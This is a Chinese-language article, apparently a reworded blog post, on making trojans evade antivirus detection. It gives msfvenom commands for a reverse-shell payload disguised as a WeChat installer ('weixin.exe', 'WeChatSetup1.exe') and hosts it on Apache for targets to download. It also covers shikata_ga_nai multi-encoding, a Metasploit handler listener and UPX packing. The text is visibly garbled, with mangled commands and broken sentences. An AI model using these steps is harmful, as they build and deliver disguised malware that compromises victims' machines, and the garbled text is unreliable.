木马免杀的几种方式有哪些，木马免杀的几种方式

很多朋友对木马免杀的几种方式有哪些，木马免杀的几种方式不是很了解，六月小编刚好整理了这方面的知识，今天就来带大家一探究竟。

免杀，也叫杀毒技术，是杀毒反间谍的对立面。是一种可以防止病毒或木马被杀毒软件查杀的软件。既能防止病毒木马被查杀，又能放大病毒木马的功能，改变其行为。免杀的基本特征是破坏，可能是行为。只要破坏病毒和木马的固有特性，不改变其原有功能，就可以一次性完成免杀。

免杀技术并不令人发指。比如软件防护中使用的一些加密产品(比如外壳)会被杀毒软件认为是木马病毒；一些安全领域的安全检测产品也会被杀毒软件查杀。这时候就需要免杀技术来应对这些不稳定因素。

1、裸奔马的企图是指没有经过任何查杀处理的木马1、利用msf的MSF毒液生成木马文件，生成一个裸奔马。命名为weixin.exe命令：MSF venom-p Windows/meter preter/reverse _ TCP lhost=192 . 168 . 111 . 132 lport=8888-f Exe weixin . Exe2、在kali上部署apache服务。让目标机器访问并下载特洛伊木马2。1、kali，apache自带的。启动apache服务。

2.2、将生成的weixin.exe文件放在/var/www/html文件夹中。2.3、在无人机下访问192.168.111.132/weinxin.exe，下载。2.4、如果发现被AV杀死，直接。这种方式也是有风险的，所以在交付之前，需要测试木马是否会造成相关AV的查杀，比如在一个在线的多引擎病毒识别工具中。

2.5、这里是一个在线防病毒网站。virustotal是一个提供免费可疑文件分析服务的网站。它和传统杀毒软件的区别在于，它通过各种杀毒引擎扫描文件。使用多种反病毒引擎检测您上传的文件，以确定文件是否被病毒、蠕虫、木马和各种恶意软件感染。2、MSF编码

metasploit框架下避免查杀的方法之一是msf编码器，它的作用是对我们用msf编码器制作的木马进行重新编码，生成一个二进制文件。该文件运行后，msf编码器会将原始程序解码到内存中并执行它。1、在kali终端输入msfvenom -l编码器，它可以列出所有可用的编码格式。

2、 MSF的/data/templates/下有很多metasploit附带的用于绑定木马的程序模板。这个模块是一些杀毒厂商的重点。为了更好的实现免杀，我们需要选择一个程序独立绑定。这里选择真正的微信安装包。

(裸奔马也有用shikata_ga_nai编码Rao AV的方法，但是shikata_ga_nai编码技术是多态的，每次生成的攻击加载文件都不一样。生成的文件有时候会被杀，有时候不会，于是生成捆绑木马，进行shikata_ga_nai编码。)

将微信安装包放入/root文件夹3、在Windows环境下使用msfvenom生成木马，绑定WeChatSetup.exe生成WeChatSetup1.exe的合成马。同时，木马采用x86/shikata_ga_nai多次编码，避免查杀。MSF Venom-p Windows/shell _ reverse _ TCP lhost=192 . 168 . 111 . 132 lport=9999-Ex86/Shikata _ GA _ Nai-x微信setup . Exe-I 12-F Exe-o/root/微信Setup1。参数描述：-e/指定编码方法。

-x/指定木马绑定到哪个可执行程序模板-I/指定编码目标的次数，多次编码理论上有助于实现免杀-f/指定msf编码器输出程序的格式-0/指定处理后的文件输出路径4、将生成的文件放入kali中apache服务对应的文件夹中。使攻击机访问5、攻击机下载后，在msf Windows/shell/reverse_tcp上创建monitor use exploit/multi/handler有效载荷//选择有效载荷为Windows/shell/reverse_tcp。

Show options ///看看哪些选项需要用set lhost 192.168.111.132 ///设置主机地址set lport 9999 ///设置主机端口，在目标机器上点击伪造的安装包进行端口运行6、，没有打开，因为安装包源文件在绑定木马和多次编码后已经损坏。

Upx packager有两个函数，一个是调用外壳程序，另一个是调用压缩程序。这里使用打包程序的目的是改变后门程序的特征码。压缩时：它先对可执行文件中的可执行数据进行解压缩，然后将解压缩的代码附加到前面的操作中：对原始的可执行数据进行解压缩，然后运行解压缩后的数据1、 kali中有一个内置的upx packer。输入upx看参数介绍。

2、简单的命令是直接对文件进行upx，并对文件进行外壳处理。添加shell后，文件大小会因为压缩而减小3、还是一样。将上面已经编码脱壳的微信安装包放在apache服务的文件夹中，供目标机读取下载(如上面2.4所示)4、。

无杀技术也被安全技术厂商盯上，开发了相应的检测技术，所以无杀技术和软件查杀技术相互促进发展，发展速度非常快。一些现在可以测试成功的软件查杀技术，过一段时间就不用了。免杀技术还是要好好学习，然后我会试试python和GO写的免杀技术，后续文章里也会描述进度！审核编辑：李倩

以上就是关于木马免杀的几种方式有哪些，木马免杀的几种方式的知识，希望能够帮助到大家！